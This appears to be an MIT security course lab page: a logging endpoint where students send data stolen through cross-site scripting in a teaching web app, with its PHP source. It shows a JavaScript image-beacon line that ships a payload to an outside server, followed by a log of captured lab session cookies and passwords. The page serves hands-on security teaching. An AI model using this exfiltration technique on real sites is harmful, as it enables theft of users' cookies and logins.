You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.566/2024/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Sat, 13 Sep 2025 17:24:37 +0000: my-username: some-string Wed, 10 Sep 2025 10:31:07 +0000: abc: q/q Wed, 10 Sep 2025 06:53:39 +0000: abc: grader/NLNSLYSXGPPW Wed, 10 Sep 2025 06:53:28 +0000: abc: grader/ACFIJWGYZDKD Wed, 10 Sep 2025 06:53:21 +0000: abc: grader/OPTKASUFFVGV Wed, 10 Sep 2025 06:53:01 +0000: abc: PyZoobarLogin=grader#1582567fb6cb4d37e10f40b5ea9e0bb86db4d0e287a7c9dd9a26cbb540642111 Wed, 10 Sep 2025 06:52:55 +0000: abc: PyZoobarLogin=grader#3e5a05a0ef9ba1a19654f3c9e7d1b19942bd1212ec6f46b923ffaf5c4990c5e8 Wed, 10 Sep 2025 06:52:42 +0000: abc: PyZoobarLogin=grader#2ff0d6263fdf53aa7e6c865729cf8c5bd509a0d2d65b5ed193dac39f151c9926 Fri, 05 Sep 2025 11:51:22 +0000: abc: grader/QDJDFUVCXWIZ Fri, 05 Sep 2025 11:51:11 +0000: abc: grader/GNBYDVFXQFKC Fri, 05 Sep 2025 11:51:05 +0000: abc: grader/MLAMZHHXZCKH Fri, 05 Sep 2025 11:50:41 +0000: abc: PyZoobarLogin=grader#b902aa333ae6951b6d6bc86d673f151fdd6adb3aca86456727962ffd8f08412d Fri, 05 Sep 2025 11:50:35 +0000: abc: PyZoobarLogin=grader#dc6bcab8f9c2d176902c660ac3ae61a25060c8c5a3799b26d3ce180e605c9164 Fri, 05 Sep 2025 11:50:22 +0000: abc: PyZoobarLogin=grader#604120585a0ff9aa454928510b974667fb872cfc81f2d617850b3a536d089a1c Fri, 05 Sep 2025 11:46:35 +0000: abc: grader/IYNIILAOKSQG Fri, 05 Sep 2025 11:46:23 +0000: abc: grader/WQLGHMHEXOUH Fri, 05 Sep 2025 11:46:17 +0000: abc: grader/ZCUEIXYURGAI Fri, 05 Sep 2025 11:45:50 +0000: abc: PyZoobarLogin=grader#5c0e22f381fb9b2ffc41628b766a1ee3e0c251620ef4ba63d39487d3b0f07c66 Fri, 05 Sep 2025 11:45:44 +0000: abc: PyZoobarLogin=grader#9868b33c9ca45f32ffeb6c60cc0fb95a6350aba4790e9bc4890d491cdbfe446d Fri, 05 Sep 2025 11:45:31 +0000: abc: PyZoobarLogin=grader#79cdbe903f16180397a14ce2ce20517da1afbcacbcb929187028be2b1d9579ce Fri, 05 Sep 2025 11:36:10 +0000: abc: grader/QXHSLELMMJIP Fri, 05 Sep 2025 11:35:57 +0000: abc: grader/OBZLQFLVHAAJ Fri, 05 Sep 2025 11:35:50 +0000: abc: grader/OXZHYLLXKACG Fri, 05 Sep 2025 11:35:14 +0000: abc: PyZoobarLogin=grader#a5af0ed4728c038f85c61a55f3d34c700a45641812d1d2d6db4774818642140c Fri, 05 Sep 2025 11:35:07 +0000: abc: PyZoobarLogin=grader#13eaee4d425238bf50c8c97d07ded94865b7eae5de5b138bf2fa46baa826fb6d Fri, 05 Sep 2025 11:34:53 +0000: abc: PyZoobarLogin=grader#f09751d8e484675cf6abdc9e1eef98f2818481a3ab4b361aeb034a626edfde34 Fri, 05 Sep 2025 06:06:03 +0000: abc: grader/PDFYTRHVQUQP Fri, 05 Sep 2025 06:05:49 +0000: abc: grader/GYFAODADYJTR Fri, 05 Sep 2025 06:05:43 +0000: abc: grader/XJZCWKJWGFGU Fri, 05 Sep 2025 06:05:09 +0000: abc: PyZoobarLogin=grader#3c9c6bcb2ab3a23f22d7a6b4455fb4b949ed61fe58dcc4a56ef05d29f4aeb86b Fri, 05 Sep 2025 06:05:02 +0000: abc: PyZoobarLogin=grader#d8b314e3d39192846b497e7b08918275cb73d9239c4795883c780a7be62863a9 Fri, 05 Sep 2025 06:04:50 +0000: abc: PyZoobarLogin=grader#13105c051e8bf7b273e47f73a5549d439962d11f802c9b0d988b1e16fbcb8a14 Fri, 05 Sep 2025 05:44:04 +0000: abc: grader/DLFFOPCJUYND Fri, 05 Sep 2025 05:43:32 +0000: abc: grader/TQWZJNLYCORT Fri, 05 Sep 2025 05:42:57 +0000: abc: PyZoobarLogin=grader#55fdab1d2c23610bb4292412a2113672e63aaaf05867227e69cd34d1297ed8f1 Fri, 05 Sep 2025 05:42:50 +0000: abc: PyZoobarLogin=grader#f3164d585c85b914f5690f93e3390b898cb245fcb3e42a17835f90ac3d0dc7f2 Fri, 05 Sep 2025 05:42:37 +0000: abc: PyZoobarLogin=grader#788b7142e7a94d7dfae5be6848a37a2adff5b6a8204b621acc07bba9c1c97157 Fri, 05 Sep 2025 04:44:42 +0000: abc: grader/XEGGQAJIXZBZ Fri, 05 Sep 2025 04:44:35 +0000: abc: grader/YKJQYZJJZBXQ Fri, 05 Sep 2025 04:44:04 +0000: abc: PyZoobarLogin=grader#6b955aafc22e7b7bf4855b516a1de29ed6f35590e10bca68ce52f74abb1dce7f Fri, 05 Sep 2025 04:43:58 +0000: abc: PyZoobarLogin=grader#80e0af056054caa19f3dd02f1e12ebf3bb43d63c5180a6e4b55900e6782b4b50 Fri, 05 Sep 2025 04:43:44 +0000: abc: PyZoobarLogin=grader#66a95451016aed342ebe3da050f7905da05b6bd6e29b011eb94d1e4a27132512 Fri, 05 Sep 2025 04:41:12 +0000: abc: alice/alice Fri, 05 Sep 2025 04:33:18 +0000: abc: q/q Fri, 05 Sep 2025 04:23:46 +0000: abc: q/q Fri, 05 Sep 2025 04:12:52 +0000: abc: grader/QQNMRCHAKLOU Fri, 05 Sep 2025 04:12:45 +0000: abc: grader/TQIUTRCKRUKD Fri, 05 Sep 2025 04:12:15 +0000: abc: PyZoobarLogin=grader#50fbb423ab0f76d939d70e4c026bd3f1d41db9a8ee181cf9b7b1295edd1558e4 Fri, 05 Sep 2025 04:12:09 +0000: abc: PyZoobarLogin=grader#f8a298bb995fa10ed507e5604238510a646f99cae4690d8c34b33e7af9a1b4b6 Fri, 05 Sep 2025 04:11:56 +0000: abc: PyZoobarLogin=grader#52224f7fda2cd1369eb93edc53c23a2e63a9e6f4a6109d20c6141ecbdc8d6b35 Thu, 04 Sep 2025 19:00:14 +0000: abc: grader/WUUSEZCPVXRQ Thu, 04 Sep 2025 19:00:07 +0000: abc: grader/FWFMISGGPCNW Thu, 04 Sep 2025 18:59:43 +0000: abc: PyZoobarLogin=grader#210962fe88b33b0fedace0de2d920c0519d674a515e664906426adcfd93d4802 Thu, 04 Sep 2025 18:59:36 +0000: abc: PyZoobarLogin=grader#9286518d94842528eecbd5f7cd97fdd2a4ab70eb0b432c9aac646cdca193116e Thu, 04 Sep 2025 18:59:23 +0000: abc: PyZoobarLogin=grader#ed547086d2d9ed9fc50334002f216733b90d0f9374d812c96ff8b9e019b33eec Thu, 04 Sep 2025 18:54:08 +0000: abc: grader/XXKMTYDHBAMV Thu, 04 Sep 2025 18:54:01 +0000: abc: grader/JUHEFRNOAPLP Thu, 04 Sep 2025 18:53:36 +0000: abc: PyZoobarLogin=grader#bb553ee8441e0754bed69bf181e01761314f6f7208f0e8fb1a2d371e936fb4fe Thu, 04 Sep 2025 18:53:30 +0000: abc: PyZoobarLogin=grader#0b0b6a3a66db120182b510dcd1c76a665d81c44c02ccfb65c7b5bcd1d2b21256 Thu, 04 Sep 2025 18:53:16 +0000: abc: PyZoobarLogin=grader#6c4b7d14975847dd093d6df75c97ac65eeb1f44b47550daaa926d2a5028ba7f7 Thu, 04 Sep 2025 18:47:26 +0000: abc: grader/DHZOXOBKZLWQ Thu, 04 Sep 2025 18:47:19 +0000: abc: grader/GTSIEQFNXXFP Thu, 04 Sep 2025 18:46:53 +0000: abc: PyZoobarLogin=grader#51b69f0d80f4880b32934f130931c3c60e70a0211e5cf75a7cf071d44f765040 Thu, 04 Sep 2025 18:46:46 +0000: abc: PyZoobarLogin=grader#5e2526e39dab72b2af6a8549e58b966c21c7271619aa99f1fc964008ec5a71ed Thu, 04 Sep 2025 18:46:33 +0000: abc: PyZoobarLogin=grader#d5e57eb6bc9d255039bde7248280024518230365b2d953a4b7b02c30a5bd9d43 Thu, 04 Sep 2025 18:43:58 +0000: abc: grader/ZFATHXBEALFB Thu, 04 Sep 2025 18:43:26 +0000: abc: grader/TTZVHPSCDTYT Thu, 04 Sep 2025 18:42:48 +0000: abc: PyZoobarLogin=grader#238ecd9730c8dfc1a750cbee61866b059597c6d78e955c0c3eeacfbb07d65e85 Thu, 04 Sep 2025 18:42:40 +0000: abc: PyZoobarLogin=grader#e6fb3a469f1f492636ba11e6ff0d6099e8b57ec975819b539fc407f5d9d75fb4 Thu, 04 Sep 2025 18:42:27 +0000: abc: PyZoobarLogin=grader#ce165c4b7d3001be24930ae3c6058cbc854ab702a55897ecce2a02bfbb3fffa9 Thu, 04 Sep 2025 18:14:48 +0000: abc: grader/SIOUTVURGFCO Thu, 04 Sep 2025 18:14:25 +0000: abc: PyZoobarLogin=grader#2f7a54724b29acdadd4e73667f75e12a209fb6a1d60f397fec62bb09dd4a2842 Thu, 04 Sep 2025 18:14:18 +0000: abc: PyZoobarLogin=grader#01ccb844b035639e34d55b474f59cb3de3c6d3bd26346c76a40c146aaf87e6b3 Thu, 04 Sep 2025 18:14:05 +0000: abc: PyZoobarLogin=grader#16fd583ace494f4d7ca3bc1c4b699a21f44aea3baeb3553e6f88481489fa4e77 Thu, 04 Sep 2025 18:10:27 +0000: abc: PyZoobarLogin=grader#e50d489bd8bda34e04084ea6a611a6c69708a4099605d42bf3fe03972239c0f7 Thu, 04 Sep 2025 18:10:20 +0000: abc: PyZoobarLogin=grader#4ebed237c003ddeda4d60675511a85cb1dd16f5df3c49ef017ced58fa9953635 Thu, 04 Sep 2025 18:10:07 +0000: abc: PyZoobarLogin=grader#398f2b7919cfa75ea2af11e4c7f775440d84b68553dcd85020dba2c5afbea1fb Thu, 04 Sep 2025 18:04:58 +0000: abc: PyZoobarLogin=grader#713fdffa41ab68dd4c2f6543d2e37aa70317ec49a5acd090463b5da0884a35be Thu, 04 Sep 2025 18:04:51 +0000: abc: PyZoobarLogin=grader#58c601dd901f99877a026b52df49751f5b39cc6f35388e5d97ebdba9c32c898d Thu, 04 Sep 2025 18:04:38 +0000: abc: PyZoobarLogin=grader#6c8383f4919680e830d342d4847fce74f5c8c4d0d1b92fbf22d8b187c3ef9e83 Thu, 04 Sep 2025 18:03:04 +0000: abc: PyZoobarLogin=grader#850491752628845fb3e161125b325861ac5f2df77976c8c92e5698663cd6dcad Thu, 04 Sep 2025 18:02:59 +0000: abc: PyZoobarLogin=grader#0380ee0ce5747463a9c6b33f4f2ea5d6f82a211f20cc44a459185f508e8dbf0f Thu, 04 Sep 2025 18:02:45 +0000: abc: PyZoobarLogin=grader#65c0c822a99b9d1555fa2dfcdc64d56da8ba0291694bb9c750326f548dfd711b Thu, 04 Sep 2025 17:57:43 +0000: abc: PyZoobarLogin=grader#3c236e0c70fbab631d9d400148320dfb9a3737b7baeda5d60fdaeb9fb61f840c Thu, 04 Sep 2025 17:57:36 +0000: abc: PyZoobarLogin=grader#8752a28d2b8476e6a269a45015fa7a8445b9175abae569fea7dc191b892f5d29 Thu, 04 Sep 2025 17:57:23 +0000: abc: PyZoobarLogin=grader#30d673354a5c4b5b797d4319a6c215f1742bdefce213c02cc2a622c1bd77f244 Thu, 04 Sep 2025 17:54:25 +0000: abc: PyZoobarLogin=grader#7479b498c5439a80b0a1860b4f8ee5b560569c29a59cf8fc130888f6f519594a Thu, 04 Sep 2025 17:54:19 +0000: abc: PyZoobarLogin=grader#8fffe588e5a0fa43ffddf5ee6be9784bc8b2b0ad6cdb98f6c2aa4f2a581af98c Thu, 04 Sep 2025 17:54:05 +0000: abc: PyZoobarLogin=grader#a7ab73e660e94050d3a4087871f660c551fa8fb264f8ed3041c8a4f5a644774a Thu, 04 Sep 2025 17:39:04 +0000: abc: PyZoobarLogin=grader#6338d100f5ee5c01cc7ebf37c481aa126588eca0c309bdae07e62fcf439b7a5d Thu, 04 Sep 2025 17:38:58 +0000: abc: PyZoobarLogin=grader#b828b6346109e1ebef0e00ab3caa655d35d20d8b8e6c920b4bc46ec5678394c9 Thu, 04 Sep 2025 17:38:45 +0000: abc: PyZoobarLogin=grader#7836198bf9e2b8e29a5d733f20ea088faa72ff902ceb3db6a4814a44b7499033 Thu, 04 Sep 2025 16:50:21 +0000: abc: PyZoobarLogin=grader#ed9715640889aff4d3ec302021eea69c4da0ede434de3a55407be8e120807b2b Thu, 04 Sep 2025 16:50:15 +0000: abc: PyZoobarLogin=grader#2c7d13028bb51ef46d06c25b653d1ad4e421edcbc109885302e69cb665ee3fb8 Thu, 04 Sep 2025 16:50:01 +0000: abc: PyZoobarLogin=grader#f5eba4cf922de6e365d777f7c0e725cc3459086db828d55b01011d3c4669d415 Thu, 04 Sep 2025 16:47:56 +0000: abc: PyZoobarLogin=grader#10ae67350231327e1037d7c428229cc65cacb8242cd3907c6bd4698eb9c94abe Thu, 04 Sep 2025 16:47:50 +0000: abc: PyZoobarLogin=grader#762dda1ba1a402efc82f7905baaad334be8abdb5f438b581c8abad39389c5f9f Thu, 04 Sep 2025 16:47:36 +0000: abc: PyZoobarLogin=grader#3d44506dac68894c9430f6f737cec97be8742650e86baaea95e67df523a97e69 Thu, 04 Sep 2025 16:45:10 +0000: abc: PyZoobarLogin=grader#766f0929fc39f1bda82b55d07b445d54edf8d5817c62ddee366deb4141637b06 Thu, 04 Sep 2025 16:45:04 +0000: abc: PyZoobarLogin=grader#7cc0496b791b79c63311252181af8f9e6f0d7a2a490f4991dd918f364c54eaf2 Thu, 04 Sep 2025 16:44:50 +0000: abc: PyZoobarLogin=grader#80f8f29c48be2f13ca8414509b8e6378b34d862df7e09badbd3e24f6bf53a0f0
In case you are curious, here is the source code of this page.
<?php header("Access-Control-Allow-Origin: *"); do { if (!array_key_exists("id", $_REQUEST)) { break; } $id = $_REQUEST['id']; if (strlen($id) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "ID value is larger than 1000 bytes"; return; } if (!array_key_exists("payload", $_REQUEST)) { header("HTTP/1.0 400 Bad Request"); echo "No payload given"; return; } $payload = $_REQUEST['payload']; if (empty($payload)) { header("HTTP/1.0 400 Bad Request"); echo "Empty payload given"; return; } if (strlen($payload) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "Payload is larger than 1000 bytes"; return; } if (!function_exists('apcu_add')) { header("HTTP/1.0 501 Not Implemented"); echo "APCu not enabled, so no rate limiting; refusing all requests"; return; } if (apcu_add($payload, true, 5) === false) { // exact same $payload was sent in the past 5 seconds header("HTTP/1.0 429 Too Many Requests"); echo "That exact payload was sent very recently; rejecting"; return; } $payload = str_replace(array("\n", "\r"), '.', $payload); $id = str_replace(array("\n", "\r"), '.', $id); $file = fopen("/tmp/6.566-2024-logger.txt", "c+"); if ($file === false) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to open log file"; return; } if (!flock($file, LOCK_EX)) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to lock log file"; return; } $lines = array(); while (!feof($file) && count($lines) < 100) { $lines[] = fgets($file); } ftruncate($file, 0); rewind($file); fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n"); foreach ($lines as &$line) { fwrite($file, $line); } flock($file, LOCK_UN); fclose($file); echo "Logged!"; return; } while(0); $link = "(new Image()).src=" . "'https://css.csail.mit.edu/6.566/2024/labs/log.php?'" . " + 'id=my-username'" . " + '&payload=some-string' + '&random='" . " + Math.random()"; ?><!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="labs.css" /> <title>Lab 4 Logging Script</title> </head> <body> <h1>Lab 4 Logging Script</h1> <p> You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload: </p> <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre> <p> The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links; if this bothers you, try <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>. </p> <h2>Test form</h2> <p> If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.) </p> <form method="GET" action=""> <label for="id">ID:</label><br /> <input name="id" placeholder="your-mit-username" size="40" /> <i>(some identifier to locate your payload in the log)</i> <br /> <br /> <label for="payload">Payload:</label><br /> <input name="payload" placeholder="some-string" size="40" /> <i>(the information you stole)</i> <br /> <input type="submit" value="Log" name="log_submit" /> </form> <h2>Logged entries</h2> <p> Below are the most recent logged entries, so that you can check if your attack worked: </p> <pre class="tty"><?php $lines = file_get_contents("/tmp/6.566-2024-logger.txt"); echo htmlspecialchars($lines); ?></pre> <h2>Source code</h2> <p>In case you are curious, here is the source code of this page.</p> <pre><?php highlight_file(__FILE__); ?></pre> </body> </html>